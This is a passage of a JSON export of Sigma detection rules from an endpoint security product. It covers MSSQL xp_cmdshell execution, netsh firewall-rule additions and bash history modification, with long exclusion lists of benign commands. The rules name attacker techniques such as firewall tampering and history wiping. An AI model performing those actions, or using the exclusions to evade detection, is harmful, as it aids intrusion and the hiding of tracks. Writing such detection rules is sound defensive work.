'?:\\Windows\\system32\\cmd.exe /c E:\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c if exist \\\\* rmdir *'\n - '?:\\Windows\\system32\\cmd.exe /c MKDIR ?:\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c md ?:\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c if not exist *'\n - '?:\\Windows\\system32\\cmd.exe /c IF EXIST *'\n - '?:\\Windows\\system32\\cmd.exe /c copy *'\n - '?:\\Windows\\system32\\cmd.exe /c xcopy *'\n - '?:\\Windows\\system32\\cmd.exe /c MOVE/Y *'\n - '?:\\Windows\\system32\\cmd.exe /c XCOPY ?:\\Program Files\\Microsoft SQL Server\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c robocopy ?:\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c BCP *'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Inetpub\\wwwroot\\iVue\\iVue_JobAgentStart.vbs'\n - '?:\\Windows\\system32\\cmd.exe /c powershell.exe -c Get-WmiObject -ComputerName * -Class Win32_Volume -Filter ?DriveType = 3? *'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $serviceName = * ; $result = Get-service*| where {($_.name -eq $serviceName -and $_.status -eq ?running?) }*'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $hostname=hostname;Get-winEvent -filterHashTable @{logname =*Microsoft-Windows-FailoverClustering/Operational*; id=1201}*'\n - '?:\\Windows\\system32\\cmd.exe /c powershell.exe $* = systeminfo /s %computername% | findstr /i /c:?Model:? /c:?System Boot Time? /c:?Host Name?;foreach ($* in $*) { if ($* -like ?*Host Name*?)'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Get-winEvent *'\n - '?:\\Windows\\system32\\cmd.exe /c net use'\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Inetpub\\wwwroot\\iVue\\iVue_LineToUTF-8_file.vbs /ReportId:*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c cscript.exe //nologo ?:\\inetpub\\wwwroot\\iVue\\iVue_LineToUTF-8_file.vbs /ReportId:*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Inetpub\\wwwroot\\iVue\\iVue_startBatchPrint.vbs /RunId:*'\n - '?:\\WINDOWS\\system32\\cmd.exe /c cscript.exe //nologo ?:\\inetpub\\wwwroot\\iVue\\iVue_startBatchPrint.vbs /RunId:*'\n - '?:\\Windows\\system32\\cmd.exe /c cscript.exe //nologo ?:\\inetpub\\wwwroot\\ivue\\iVue_JobAgentStart.vbs'\n - '?:\\Windows\\system32\\cmd.exe /c ?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe [System.TimeZoneInfo]::Local.GetUtcOffset((Get-Date)).TotalMinutes'\n - '?:\\Windows\\system32\\cmd.exe /c CScript ?:\\Tools\\ICCA_UpdatePtChartAccess.vbs *'\n - '?:\\Windows\\system32\\cmd.exe /c sqlcmd -E -S * -d RSAdmin -Q EXECUTE [dbo].*'\n - '?:\\Windows\\system32\\cmd.exe /c sqlcmd -E -S * -d msdb -Q DECLARE @CleanupDate datetime SET*'\n - '?:\\Windows\\system32\\cmd.exe /c net use ?: /delete'\n - '?:\\Windows\\system32\\cmd.exe /c sqlcmd -S . -d * -E -s; -W -q EXEC [dbo].[getExtract_*]*'\n - '?:\\windows\\system32\\cmd.exe /c sqlcmd *-i?:\\\\*.sql'\n - '?:\\Windows\\system32\\cmd.exe /c wmic volume where Drivetype=3 get caption, freespace, capacity, label'\n - '?:\\Windows\\system32\\cmd.exe /c wmic /FailFast:ON logicaldisk where (Drivetype =3 and volumename!=RECOVERY AND volumename!=System Reserved) get deviceid,volumename /Format:csv'\n - '?:\\WINDOWS\\system32\\cmd.exe /c set temp'\n - '?:\\Windows\\system32\\cmd.exe /c ftp -i -s*'\n - '?:\\Windows\\system32\\cmd.exe /c echo *'\n - '?:\\windows\\system32\\cmd.exe /c MOVE *'\n - '?:\\Windows\\system32\\cmd.exe /c cmd /c *\\_PRT\\Datacard\\Print.BSG.cmd'\n - '?:\\Windows\\system32\\cmd.exe /c dtexec *'\n - '?:\\Windows\\system32\\cmd.exe /c osql *'\n - '?:\\Windows\\system32\\cmd.exe /c WMIC PROCESS WHERE Name=Socle.Exploitation.Agent.exe GET NAME, CREATIONDATE, PROCESSID /FORMAT:csv'\n - '?:\\Windows\\system32\\cmd.exe /c fsutil *'\n - '?:\\windows\\system32\\cmd.exe /c *powershell.exe *\\AuditDBA\\\\*_audit_*'\n - '?:\\Windows\\system32\\cmd.exe /c WMIC SERVICE WHERE *'\n - '?:\\Windows\\system32\\cmd.exe /c python *\\NextGenCompileResolve\\CRW.pyc*'\n # dir\n - '?:\\Windows\\system32\\cmd.exe /c dir D:\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c dir E:\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c dir F:\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c dir G:\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c dir \\\\\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c DIR ?:\\Program Files\\Microsoft SQL Server\\\\*'\n - '?:\\Windows\\system32\\cmd.exe /c dir /b *'\n - '?:\\Windows\\system32\\cmd.exe /c dir /-C *'\n - '?:\\Windows\\system32\\cmd.exe /c dir /4 /-C /TW *'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "48a4e8ec-4a97-4420-8fd1-9ce20191c569",
"rule_name": "Suspicious Execution via MSSQL Stored Procedure",
"rule_description": "Detects a suspicious command execution via MSSQL xp_cmdshell extended stored procedure.\nAttackers can use this stored procedure to execute any Windows command shell on the host with the same permissions of the Microsoft SQL Server instance.\nIt is recommended to check other command executed by MSSQL and identify the source of the connection using authentication events.\n",
"rule_creation_date": "2022-07-15",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1059",
"attack.t1133",
"attack.t1190"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "48c6cf63-7480-4181-ad6b-865dbb4d413c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070239Z",
"creation_date": "2026-03-23T11:45:34.070241Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070246Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/fr-fr/windows-server/networking/technologies/netsh/netsh-contexts",
"https://attack.mitre.org/techniques/T1562/004/",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/software/S0108/"
],
"name": "t1562_004_netsh_firewall_add_rule.yml",
"content": "title: New Rule added to the Windows Firewall Policy via Netsh\nid: 48c6cf63-7480-4181-ad6b-865dbb4d413c\ndescription: |\n Detects a new rule added to the Windows firewall's policy using Netsh.\n Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage.\n Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules.\n It is recommended to investigate the added firewall rule, as well as the execution context and surrounding detections to determine if this action was legitimate.\nreferences:\n - https://docs.microsoft.com/fr-fr/windows-server/networking/technologies/netsh/netsh-contexts\n - https://attack.mitre.org/techniques/T1562/004/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/software/S0108/\ndate: 2021/05/06\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - attack.t1090\n - attack.s0108\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\netsh.exe'\n - OriginalFileName: 'netsh.exe'\n selection_cmd:\n CommandLine|contains|all:\n - ' advfirewall '\n - ' add '\n - ' rule '\n - ' name='\n - ' action='\n\n exclusion_command:\n CommandLine|contains:\n - 'name=?FusionInventory-Agent'\n - 'name=FusionInventory-Agent'\n - 'name=Dropbox'\n # PRTG_Network_Monitor / PRTG_Network_Monitor_Admin_Tool / PRTG_Network_Monitor_Application_Server / PRTG_Network_Monitor_Server / PRTG_Network_Monitor_Probe\n - 'name=?PRTG_Network_Monitor'\n - 'name=PRTG_Network_Monitor'\n - 'name=?Intel(R) System Usage Report -'\n - 'name=?BlueStacks Service Hyper-V'\n - 'name=?BlueStacks Service'\n - 'name=PRTG_Network_Monitor_Admin_Tool '\n - 'name=PRTG_Network_Monitor_Probe '\n - 'name=PRTG_Network_Monitor_Application_Server '\n - 'name=PRTG_Network_Monitor_Server '\n - 'name=One Dragon Center Bridge '\n - 'name=RecoveritUDPAccessInboundRule '\n - 'name=RecoveritTCPAccessInboundRule '\n - 'name=Sentinel RMS License Manager '\n # C:\\WINDOWS\\system32\\netsh.exe advfirewall firewall add rule name=starleaf S-1-5-21-3198272496-3173654091-250741777-1010 program=C:\\Users\\xxxxx\\AppData\\Local\\starleaf\\starleaf\\2\\starleafc.exe protocol=ANY dir=in action=allow\n - 'name=starleaf S-1-5-21-'\n - 'name=RecoveritRSUDPAccessInboundRule'\n - 'name=RecoveritRSTCPAccessInboundRule'\n - 'name=FusionInventory-Agent program=?:\\Program Files\\FusionInventory-Agent\\perl\\bin\\perl.exe'\n - 'name=FusionInventory-Agent program=?:\\Program Files\\FusionInventory-Agent\\perl\\bin\\fusioninventory-agent.exe'\n - 'name=MSExchangeIS dir=in action=allow program=?:\\Program Files\\Microsoft\\Exchange Server\\V1?\\bin\\Microsoft.Exchange.Worker.exe'\n - 'name=MSExchangeIS dir=in action=allow program=?:\\Program Files\\Microsoft\\Exchange Server\\V1?\\bin\\Microsoft.Exchange.Store.Service.exe'\n - 'name=ActivePresenter License Activator program=?:\\Program Files (x86)\\ATOMI\\ActivePresenter\\rlactivator.exe dir='\n - 'name=ActivePresenter program=?:\\Program Files (x86)\\ATOMI\\ActivePresenter\\ActivePresenter.exe dir='\n - 'name=Wildix Integration Service dir=in action=allow program=?:\\Program Files\\Wildix\\WIService\\wiservice.exe'\n - 'name= program=?:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe description= outgoing traffic dir=out action=allow'\n - 'name= program=?:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe description= embedded HTTP server incoming traffic protocol=TCP dir=in localport='\n - 'name=glpi agent program=?:\\program files\\glpi-agent\\perl\\bin\\glpi-agent.exe description=glpi agent outgoing traffic dir=out action=allow'\n - 'name=glpi agent program=?:\\program files\\glpi-agent\\perl\\bin\\glpi-agent.exe description=glpi agent embedded http server incoming traffic protocol=tcp dir=in localport=* action=allow'\n - 'name=GLPI Agent program= description=GLPI Agent embedded HTTP server incoming traffic protocol=TCP dir=in localport=* action=allow'\n - 'name=devolo Cockpit program=?:\\Program Files (x86)\\devolo\\dlan\\devolonetsvc.exe dir=in action=allow profile=any localport='\n - 'name=devolo Cockpit program=?:\\Program Files\\devolo\\dlan\\devolonetsvc.exe dir=in action=allow profile=any localport='\n - 'name=SWVisualize????.Queue.Server protocol=TCP dir=in localport=???? action=allow' # SOLIDWORKS Corp\n - '?:\\WINDOWS\\SysWOW64\\netsh.exe advfirewall firewall add rule name=MSMPI-SMPD dir=in action=allow program=?:\\Program Files\\Microsoft MPI\\Bin\\smpd.exe'\n - '?:\\WINDOWS\\SysWOW64\\netsh.exe advfirewall firewall add rule name=MSMPI-SMPD dir=out action=allow program=?:\\Program Files\\Microsoft MPI\\Bin\\smpd.exe'\n - '?:\\WINDOWS\\SysWOW64\\netsh.exe advfirewall firewall add rule name=MSMPI-LaunchSvc dir=in action=allow program=?:\\Program Files\\Microsoft MPI\\Bin\\msmpilaunchsvc.exe'\n - '?:\\WINDOWS\\SysWOW64\\netsh.exe advfirewall firewall add rule name=MSMPI-LaunchSvc dir=out action=allow program=?:\\Program Files\\Microsoft MPI\\Bin\\msmpilaunchsvc.exe'\n - '?:\\WINDOWS\\SysWOW64\\netsh.exe advfirewall firewall add rule name=MSMPI-MPIEXEC dir=in action=allow program=?:\\Program Files\\Microsoft MPI\\Bin\\mpiexec.exe profile=any'\n - '?:\\WINDOWS\\SysWOW64\\netsh.exe advfirewall firewall add rule name=MSMPI-MPIEXEC dir=out action=allow program=?:\\Program Files\\Microsoft MPI\\Bin\\mpiexec.exe profile=any'\n - '?:\\windows\\system32\\netsh.exe advfirewall firewall add rule name=msi center - syncserver dir=in protocol=tcp localport=33683 action=allow'\n - '?:\\windows\\system32\\netsh.exe advfirewall firewall add rule name=xddclient dir=in action=allow program=?:\\program files (x86)\\ivanti\\epm agent\\base engine\\xddclient.exe enable=yes profile=domain'\n - '?:\\windows\\system32\\netsh advfirewall firewall add rule name=taniumclient.exe dir=in action=allow protocol=tcp localport=17472 enable=yes profile=any program=?:\\program files (x86)\\tanium\\tanium client\\taniumclient.exe'\n\n exclusion_programfiles:\n ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_fiery:\n GrandparentImage: '?:\\Program Files (x86)\\FPDU\\Fiery Driver Updater.exe'\n\n exclusion_davincy:\n # C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\ProgramData\\Blackmagic Design\\DaVinci Resolve\\Support\\setupfirewall.bat\" \"C:\\Program Files\\Blackmagic Design\\DaVinci Resolve\\\"\"\n ParentCommandLine|contains: ':\\ProgramData\\Blackmagic Design\\DaVinci Resolve\\Support\\setupfirewall.bat'\n\n exclusion_sara:\n ParentImage: '*\\Microsoft.Sara.exe'\n CommandLine|contains|all:\n - 'MicrosoftSaraFiddler'\n - 'Microsoft.Sara.exe'\n\n exclusion_exchange:\n CommandLine|contains|all:\n - 'name=\"MSExchangeIS\"'\n - 'program=\"?:\\Program Files\\Microsoft\\Exchange Server\\V1?\\bin\\'\n\n exclusion_exchange_2:\n # C:\\Windows\\system32\\netsh.exe advfirewall firewall add rule name=MSExchangeIS dir=in action=allow program=D:\\Exchange\\bin\\Microsoft.Exchange.Store.Service.exe localip=any remoteip=any profile=any Enable=yes\n CommandLine|contains|all:\n - 'name=MSExchangeIS'\n - ' dir=in action=allow '\n - 'bin\\Microsoft.Exchange.Store.Service.exe'\n\n exclusion_ahnlab:\n ParentImage: '?:\\Program Files\\AhnLab\\Safe Transaction\\StSess.exe'\n GrandparentImage: '?:\\Program Files\\AhnLab\\Safe Transaction\\ASDSvc.exe'\n\n exclusion_astrill:\n # ?:\\windows\\system32\\netsh.exe advfirewall firewall add rule action=allow profile=any protocol=any enable=yes direction=in name=Astrill VPN Client program=C:\\Program Files (x86)\\Astrill\\astrill.exe\n CommandLine|contains: 'name=Astrill VPN Client program=?:\\Program Files (x86)\\Astrill\\astrill.exe'\n\n exclusion_logioption:\n # netsh advfirewall firewall add rule name=\"LogiOptionsMgr.EXE\" dir=in action=allow program=\"C:\\ProgramData\\Logishrd\\LogiOptions\\Software\\Current\\LogiOptionsMgr.EXE\" description=\"LogiOptionsMgr.EXE\" enable=yes\n # C:\\Windows\\system32\\netsh advfirewall firewall add rule name=LogiOptionsMgr.EXE dir=in action=allow program=C:\\ProgramData\\Logishrd\\LogiOptions\\Software\\Current\\LogiOptionsMgr.EXE description=LogiOptionsMgr.EXE enable=yes\n CommandLine|contains: '?:\\ProgramData\\Logishrd\\LogiOptions\\Software\\Current\\LogiOptionsMgr.EXE'\n\n exclusion_symantec:\n # netsh advfirewall firewall add rule name=Symantec Endpoint Protection Manager Webserver protocol=any action=allow dir=in enable=yes edge=no profile=domain,private,public program=C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\apache\\bin\\httpd.exe\n # netsh advfirewall firewall add rule name=Symantec Endpoint Protection Manager protocol=any action=allow dir=in enable=yes edge=no profile=domain,private,public program=C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\tomcat\\bin\\SemSvc.exe\n # netsh advfirewall firewall add rule name=\"Symantec Endpoint Protection Manager\" protocol=any action=allow dir=in enable=yes edge=no profile=domain,private,public program=\"C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager\\tomcat\\bin\\SemSvc.exe\"\n CommandLine|contains|all:\n - 'Symantec Endpoint Protection Manager'\n - '?:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection Manager'\n\n exclusion_intel:\n ParentCommandLine: '?:\\Windows\\system32\\cmd.exe /C installer.bat X I > log_install.txt 2>&1'\n GrandparentImage: '?:\\Program Files\\Intel\\SUR\\QUEENCREEK\\SurSvc.exe'\n\n exclusion_centrastage1:\n ParentImage: '?:\\ProgramData\\CentraStage\\AEMAgent\\AEMAgent.exe'\n GrandparentImage: '?:\\Program Files (x86)\\CentraStage\\CagService.exe'\n\n exclusion_centrastage2:\n # C:\\ProgramData\\CentraStage\\AEMAgent\\RMM.WebRemote\\10.3.0.52\\RMM.WebRemote.exe\n ParentImage: '?:\\ProgramData\\CentraStage\\AEMAgent\\RMM.WebRemote\\\\*\\RMM.WebRemote.exe'\n GrandparentImage: '?:\\ProgramData\\CentraStage\\AEMAgent\\AEMAgent.exe'\n\n exclusion_centrastage3:\n # netsh advfirewall firewall add rule name=rmm.webremote 9.8.0.13 dir=in action=allow program=c:\\programdata\\centrastage\\aemagent\\rmm.webremote\\9.8.0.13\\rmm.webremote.exe enable=yes\n # netsh advfirewall firewall add rule name=rmm.webremote 9.8.0.13 dir=out action=allow program=c:\\programdata\\centrastage\\aemagent\\rmm.webremote\\9.8.0.13\\rmm.webremote.exe enable=yes\n # netsh advfirewall firewall add rule name=aemagent dir=in action=allow program=c:\\programdata\\centrastage\\aemagent\\aemagent.exe enable=yes\n # netsh advfirewall firewall add rule name=aemagent dir=out action=allow program=c:\\programdata\\centrastage\\aemagent\\aemagent.exe enable=yes\n # netsh advfirewall firewall add rule name=aria dir=in action=allow program=c:\\programdata\\centrastage\\aemagent\\aria2c.exe enable=yes\n # netsh advfirewall firewall add rule name=aria dir=out action=allow program=c:\\programdata\\centrastage\\aemagent\\aria2c.exe enable=yes\n CommandLine|contains: 'program=?:\\programdata\\centrastage\\aemagent\\'\n\n exclusion_wechat:\n # netsh advfirewall firewall add rule name=WeChat dir=in action=allow program=C:\\Program Files (x86)\\Tencent\\WeChat\\WeChatPlayer.exe enable=yes\n # netsh advfirewall firewall add rule name=WeChat dir=in action=allow program=C:\\Program Files (x86)\\Tencent\\WeChat\\WeChatBrowser.exe enable=yes\n # netsh advfirewall firewall add rule name=WeChat dir=in action=allow program=C:\\Program Files (x86)\\Tencent\\WeChat\\WeChat.exe enable=yes\n CommandLine|contains|all:\n - 'name=WeChat'\n - '?:\\Program Files (x86)\\Tencent\\WeChat\\WeChat'\n\n exclusion_panda:\n # netsh.exe advfirewall firewall add rule name=panda endpoint agent dir=in program=c:\\program files (x86)\\panda security\\panda aether agent\\agentsvc.exe action=allow profile=any protocol=tcp\n # netsh.exe advfirewall firewall add rule name=panda endpoint agent dir=in program=c:\\program files (x86)\\panda security\\panda aether agent\\agentsvc.exe action=allow profile=any protocol=udp\n CommandLine|contains|all:\n - 'panda endpoint agent '\n - 'program=?:\\program files (x86)\\panda security\\panda aether agent\\agentsvc.exe'\n\n exclusion_sharepoint:\n ParentImage: '?:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\\\??\\BIN\\OWSTIMER.EXE'\n CommandLine|contains:\n - '?:\\windows\\system32\\netsh.exe advfirewall firewall add rule name=ilm web service - rms dir=in remoteip=localsubnet action=allow protocol=tcp localport=5725'\n - '?:\\windows\\system32\\netsh.exe advfirewall firewall add rule name=ilm web service - sts dir=in remoteip=localsubnet action=allow protocol=tcp localport=5726'\n\n exclusion_workflowmanagertools:\n CommandLine|startswith: 'netsh advfirewall firewall add rule name=Workflow Manager Tools'\n ParentCommandLine|contains: '?:\\Program Files (x86)\\Workflow Manager Tools\\'\n\n exclusion_juliewebapp:\n CommandLine|startswith:\n - 'netsh advfirewall firewall add rule name=Julie* program=C:\\Program Files (x86)\\Julie Software\\'\n - 'netsh advfirewall firewall add rule name=Julie* dir=in action=allow protocol=TCP localport='\n ParentImage: '?:\\Windows\\SysWOW64\\msiexec.exe'\n\n exclusion_manageengine:\n CommandLine: '?:\\Windows\\System32\\netsh.exe advfirewall firewall add rule name=ManageEngine *'\n ParentCommandLine: '?:\\Windows\\system32\\cscript.exe firewallException.vbs ADD *'\n Ancestors|contains: '\\ManageEngine_'\n\n exclusion_manageengine2:\n CommandLine: '?:\\Windows\\System32\\netsh.exe advfirewall firewall add rule name=*'\n Ancestors|contains: '|?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\dcconfig.exe|?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\dcagentservice.exe|'\n\n exclusion_labtech:\n GrandparentImage: '?:\\Windows\\LTSvc\\LTSVC.exe'\n\n exclusion_schneider:\n GrandparentImage: '?:\\Program Files (x86)\\Schneider Electric\\FloatingLicenseManager\\ReadOptFileWinServ.exe'\n\n exclusion_siemens:\n ProcessGrandparentImage: '?:\\Windows\\Temp\\TSplusInstaller\\Setup-Siemens.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'TSplus SAS'\n\n exclusion_printx:\n ParentCommandLine: '?:\\windows\\system32\\cmd.exe /c ?:\\program files\\printix.net\\printix client\\open_firewall.cmd'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "48c6cf63-7480-4181-ad6b-865dbb4d413c",
"rule_name": "New Rule added to the Windows Firewall Policy via Netsh",
"rule_description": "Detects a new rule added to the Windows firewall's policy using Netsh.\nAdversaries may disable or modify system firewalls in order to bypass controls limiting network usage.\nChanges could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules.\nIt is recommended to investigate the added firewall rule, as well as the execution context and surrounding detections to determine if this action was legitimate.\n",
"rule_creation_date": "2021-05-06",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1562.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "48dbdaf6-eeec-46f9-b3da-e1fa449854a5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628346Z",
"creation_date": "2026-03-23T11:45:34.628348Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628352Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md",
"https://attack.mitre.org/techniques/T1070/003/"
],
"name": "t1070_003_bash_history_modified_linux.yml",
"content": "title: Bash History File Modified\nid: 48dbdaf6-eeec-46f9-b3da-e1fa449854a5\ndescription: |\n Detects a suspicious modification of the bash history files.\n Attackers can modify the bash history files to hide their tracks by removing their command history.\n It is recommended to check the parent process for suspicious activities.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md\n - https://attack.mitre.org/techniques/T1070/003/\ndate: 2023/01/03\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.003\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Deletion\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path|endswith: '/.bash_history'\n - TargetPath|endswith: '/.bash_history'\n\n filter_read:\n Kind: 'access'\n Permissions: 'read'\n\n filter_misc:\n Kind:\n - 'remove' # This is handled by the rule 4f8964a4-5740-479c-8358-30799f2df2d6\n - 'rename' # This is handled by the rule 4f8964a4-5740-479c-8358-30799f2df2d6\n - 'chmod'\n - 'chown'\n\n exclusion_bash:\n ProcessImage:\n - '/bin/bash'\n - '/usr/bin/bash'\n - '/nix/store/*bash*/bin/bash'\n\n exclusion_librenms:\n ProcessGrandparentImage: '/usr/sbin/crond'\n ProcessParentCommandLine: '/bin/bash -c /opt/librenms/fixrights.sh'\n\n exclusion_docker:\n ProcessImage:\n - '/usr/local/bin/dockerd'\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n\n exclusion_mkhomedir_helper:\n ProcessImage:\n - '/usr/bin/mkhomedir_helper'\n - '/usr/sbin/mkhomedir_helper'\n\n # Some servers can have a custom PROMPT_COMMAND to sync the different bash_history\n exclusion_tee_append:\n ProcessImage: '/usr/bin/tee'\n ProcessCommandLine|startswith: 'tee -a '\n\n exclusion_rsnapshot:\n ProcessParentCommandLine: '/usr/bin/perl -w /usr/bin/rsnapshot daily'\n\n exclusion_puppet:\n ProcessImage|startswith: '/opt/puppetlabs/'\n\n exclusion_rsync:\n - ProcessImage: '/usr/bin/rsync'\n - ProcessParentImage: '/usr/bin/rsync'\n\n exclusion_rancher_kube:\n ProcessImage: '/usr/local/bin/rke2'\n\n exclusion_basebackup:\n ProcessImage: '/bin/pg_basebackup'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "48dbdaf6-eeec-46f9-b3da-e1fa449854a5",
"rule_name": "Bash History File Modified",
"rule_description": "Detects a suspicious modification of the bash history files.\nAttackers can modify the bash history files to hide their tracks by removing their command history.\nIt is recommended to check the parent process for suspicious activities.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "48f0f344-553f-4625-bdde-3c3f6e4f8e44",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600997Z",
"creation_date": "2026-03-23T11:45:34.601001Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601008Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tpmtool.yml",
